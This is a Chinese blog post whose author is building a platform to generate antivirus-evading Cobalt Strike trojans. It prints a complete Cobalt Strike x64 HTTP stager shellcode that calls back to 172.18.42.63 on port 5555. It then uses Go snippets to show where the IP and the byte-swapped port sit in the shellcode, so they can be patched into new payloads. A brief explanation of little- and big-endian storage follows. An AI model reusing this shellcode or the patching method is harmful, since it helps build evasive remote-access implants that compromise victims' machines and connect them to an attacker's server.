CS shellcode提取IP&port:
阿新 • • 發佈:2021-11-01
0x00 前言:
最近閒來無事搞了一個免殺平臺玩兒玩兒,用於生成免殺Cobalt Strike木馬和免殺載入一些其它shellcode(如msf、自定義等),在開發過程中遇到了不少有意思的事情,所以這裡就和大家分享一下這些。
0x01 CS shellcode提取IP&port:
起初做的平臺是用CS生成的shellcode去生成免殺馬,後來感覺太過於麻煩,每次生成免殺木馬前都要先去生成shellcode,遂改良了一下,下面講一下我從CS shellcode提取IP&port的思路:
1.首先Cobalt Strike生成C(java、python、perl、C#、ruby都行)的payload:
如上圖所示:生成木馬的IP為172.18.42.63,埠為5555:
/* length: 891 bytes */ unsigned char buf[] = "\xfc\x48\x83\xe4\xf0......省略......\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x37\x32\x2e\x31\x38\x2e\x34\x32\x2e\x36\x33\x00\x00\x00\x00\x01";
修改木馬格式,將木馬修改為16進位制格式,形如:0xfc,0x48,0x83,0xe4...:
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc8,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x75,0x72,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4f,0xff,0xff,0xff,0x5d,0x6a,0x00,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x00,0x41,0x56,0x49,0x89,0xe6,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x48,0x31,0xc9,0x48,0x31,0xd2,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x41,0x50,0x41,0x50,0x41,0xba,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x73,0x5a,0x48,0x89,0xc1,0x41,0xb8,0xb3,0x15,0x00,0x00,0x4d,0x31,0xc9,0x41,0x51,0x41,0x51,0x6a,0x03,0x41,0x51,0x41,0xba,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x59,0x5b,0x48,0x89,0xc1,0x48,0x31,0xd2,0x49,0x89,0xd8,0x4d,0x31,0xc9,0x52,0x68,0x00,0x02,0x40,0x84,0x52,0x52,0x41,0xba,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x48,0x83,0xc3,0x50,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0xff,0xff,0xff,0xff,0x4d,0x31,0xc9,0x52,0x52,0x41,0xba,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x0f,0x85,0x9d,0x01,0x00,0x00,0x48,0xff,0xcf,0x0f,0x84,0x8c,0x01,0x00,0x00,0xeb,0xd3,0xe9,0xe4,0x01,0x00,0x00,0xe8,0xa2,0xff,0xff,0xff,0x2f,0x43,0x43,0x74,0x63,0x00,0x08,0xa7,0x7e,0xde,0x11,0xed,0x24,0xe4,0xdf,0xb0,0xe9,0xab,0xd7,0xd1,0x53,0x21,0xbf,0x9a,0x94,0x3b,0x2d,0x5b,0x74,0x6d,0x62,0x43,0x3a,0x72,0x95,0x5a,0xad,0xb1,0xb1,0xb8,0x1a,0x03,0xe4,0xbb,0x7a,0x16,0x06,0xf3,0xe3,0x40,0xac,0x6c,0x6b,0x96,0x84,0x5a,0x55,0xb2,0x81,0x18,0x33,0x1b,0x10,0x98,0x13,0x90,0xc7,0xec,0xf2,0x96,0x3e,0x34,0x6e,0x4f,0xfc,0x33,0x6e,0x60,0x45,0x00,0x55,0x73,0x65,0x72,0x2d,0x41,0x67,0x65,0x6e,0x74,0x3a,0x20,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x35,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x39,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x36,0x2e,0x31,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x35,0x2e,0x30,0x3b,0x20,0x58,0x42,0x4c,0x57,0x50,0x37,0x3b,0x20,0x5a,0x75,0x6e,0x65,0x57,0x50,0x37,0x29,0x0d,0x0a,0x00,0x9c,0x89,0xda,0x30,0xe8,0x5d,0x0e,0xc7,0x5d,0xc0,0xf9,0xdc,0x71,0x10,0x23,0x40,0x72,0x57,0x84,0xe5,0x27,0x96,0xe1,0xb8,0x55,0x63,0xde,0xb6,0x53,0xb2,0x5d,0xf9,0xa0,0x7c,0x0d,0x3a,0xb9,0xdd,0x93,0x0a,0xae,0x8b,0x12,0x0b,0xbe,0xf3,0x4f,0x7c,0x92,0x9b,0xa1,0xca,0xf1,0x49,0xc3,0x35,0xdf,0xfa,0x4e,0xf4,0xe5,0x12,0xae,0xeb,0x9e,0xa6,0xfe,0xd1,0xfd,0xb3,0x21,0x30,0x75,0x23,0x91,0x7d,0xed,0x03,0xb8,0xbf,0x15,0xd3,0xe8,0x48,0x62,0x1b,0x93,0x18,0x33,0xa4,0x0b,0x39,0xe2,0x24,0x50,0xd2,0x4f,0x12,0x98,0x19,0xdb,0x9e,0x3a,0x41,0x5a,0x44,0x14,0xdb,0x32,0xc0,0x07,0xfa,0x4c,0xa9,0xd1,0xad,0x49,0xa3,0x94,0x02,0x98,0xe9,0x76,0x79,0x64,0x54,0x37,0xa9,0xe5,0x5b,0x76,0xca,0x3b,0xfc,0x07,0x0c,0xdb,0x41,0x6e,0xb1,0x3d,0x9e,0x4a,0x60,0x6d,0x7e,0x0d,0xed,0xf4,0xd1,0x01,0x71,0xd0,0xd6,0xd6,0xbc,0x15,0x2d,0xfd,0x9f,0x12,0xad,0x4b,0xc3,0xc7,0x62,0x7d,0x4b,0x86,0x06,0xc2,0x58,0xf6,0x34,0x96,0x08,0x03,0x3c,0xe2,0x3d,0x50,0x2f,0x03,0xfc,0xc3,0x45,0x2b,0xcc,0x86,0x1f,0x88,0xed,0x7e,0x44,0xd2,0x90,0xbb,0x57,0xa6,0x3b,0xb8,0xfe,0x2c,0x40,0xf8,0x69,0x47,0xd8,0x00,0x41,0xbe,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x31,0xc9,0xba,0x00,0x00,0x40,0x00,0x41,0xb8,0x00,0x10,0x00,0x00,0x41,0xb9,0x40,0x00,0x00,0x00,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x41,0xb8,0x00,0x20,0x00,0x00,0x49,0x89,0xf9,0x41,0xba,0x12,0x96,0x89,0xe2,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb6,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd7,0x58,0x58,0x58,0x48,0x05,0x00,0x00,0x00,0x00,0x50,0xc3,0xe8,0x9f,0xfd,0xff,0xff,0x31,0x37,0x32,0x2e,0x31,0x38,0x2e,0x34,0x32,0x2e,0x36,0x33,0x00,0x00,0x00,0x00,0x01
現在開始正式分析這個payload,將16進位制的payload轉換為string型別:
package main
import "fmt"
func main() {
payload := []byte{0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc8, 0x00, 0x00, 0x00...}
fmt.Println(string(payload))
}
編譯執行可直接找到IP:172.18.42.63,由此可見IP是直接string -> byte放到shellcode裡的,
將IP(string型別):172.18.42.63轉換為byte型別,去鎖定其在shellcode中的位置:
package main
import "fmt"
func main() {
IP := []byte("172.18.42.63")
fmt.Printf("%#v", IP)
}
至此,我們就找到了IP,但是埠並沒有找到,翻閱百度、問群友無果後決定換個思路找找看:
5555(埠號)的16進製為15b3:
起初並沒有搜到,以為思路不對,但是在搜0x15的時候發現0xb3在0x15的前面:
會不會是小端模式的原因,埠轉16進位制,在shellcode裡的表示正好是反著的?抱著這樣的理解,準備再生成一個6666埠的shellcode驗證一下:
6666的16進製為:1a0a,在shellcode中的表示為0x0a, 0x1a,正好是反著的,驗證了我們的想法,至此IP和埠就都找到了。
小端、大端模式
這裡普及一下小端模式和大端模式:
小端模式:是指資料的高位元組儲存在記憶體的高地址中,而資料的低位元組儲存在記憶體的低地址中。
簡單的說就是低地址存低位,高地址存高位:
為了方便說明,使用16進製表示這兩個數,即0x12345678和0x11223344。小端模式採用以下方式儲存這個兩個數字:
大端模式:是指資料的高位元組儲存在記憶體的低地址中,而資料的低位元組儲存在記憶體的高地址中。
簡單的上,就是低地址存高位,高地址存低位(跟人讀寫數值的順序一樣)
為了方便說明,使用16進製表示這兩個數,即0x12345678和0x11223344。大端模式採用以下方式儲存這個兩個數字:
這兩種模式各有各的優點,用小端模式還是大端模式,取決於作業系統。